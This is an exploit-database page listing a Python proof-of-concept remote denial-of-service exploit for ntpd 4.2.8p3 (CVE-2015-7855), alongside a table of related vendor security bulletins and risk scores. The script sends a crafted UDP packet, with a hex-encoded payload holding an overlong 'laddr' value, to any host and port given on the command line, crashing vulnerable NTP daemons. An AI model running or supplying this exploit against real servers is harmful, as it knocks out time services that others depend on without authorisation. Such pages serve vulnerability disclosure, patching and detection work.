NTP 4.2.8p3 - Denial of Service

🗓️ 28 Nov 2016 00:00:00Reported by Magnus Klaaborg StubmanType

exploitpack👁 53 Views

NTP 4.2.8p3 - Denial of Service vulnerabilit

Reporter	Title	Published	Views	Family All 104
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in Network Time Protocol (NTP) affect IBM Virtualization Engine TS7700 (CVE-2015-7848, CVE-2015-7855)	18 Jun 201800:32	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in NTP affect IBM Flex System FC3171 8Gb SAN Switch and SAN Pass-thru firmware, QLogic 8Gb Intelligent Pass-thru Module and SAN Switch Module and QLogic Virtual Fabric Extension Module	31 Jan 201902:25	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Flex System Manager (FSM) is affected by multiple vulnerabilities in ntp	18 Jun 201801:30	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in NTP and GNU C Library (glibc) affect IBM Flex System EN6131 40Gb Ethernet / IB6131 40Gb Infiniband Switch Firmware	31 Jan 201902:25	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities in NTP affect Power Hardware Management Console	23 Sep 202101:31	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities impact System Storage DS8000 Hardware Management Console (HMC)	24 May 202217:06	–	ibm
Tenable Nessus	AIX 6.1 TL 9 : ntp (IV79942) (deprecated)	22 Jan 201600:00	–	nessus
Tenable Nessus	AIX 7.1 TL 3 : ntp (IV79943) (deprecated)	22 Jan 201600:00	–	nessus
Tenable Nessus	AIX 7.1 TL 4 : ntp (IV79944) (deprecated)	22 Jan 201600:00	–	nessus
Tenable Nessus	AIX 7.2 TL 0 : ntp (IV79945) (deprecated)	22 Jan 201600:00	–	nessus

#!/usr/bin/env python

# Exploit Title: ntpd 4.2.8p3 remote DoS
# Date: 2015-10-21
# Bug Discovery: John D "Doug" Birdwell
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://support.ntp.org/bin/view/Main/NtpBug2922
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz
# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
# CVE: CVE-2015-7855

import sys
import socket

if len(sys.argv) != 3:
    print "usage: " + sys.argv[0] + " <host> <port>"
    sys.exit(-1)

payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"

print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"

28 Nov 2016 00:00Current

8.3High risk

Vulners AI Score8.3

EPSS0.50067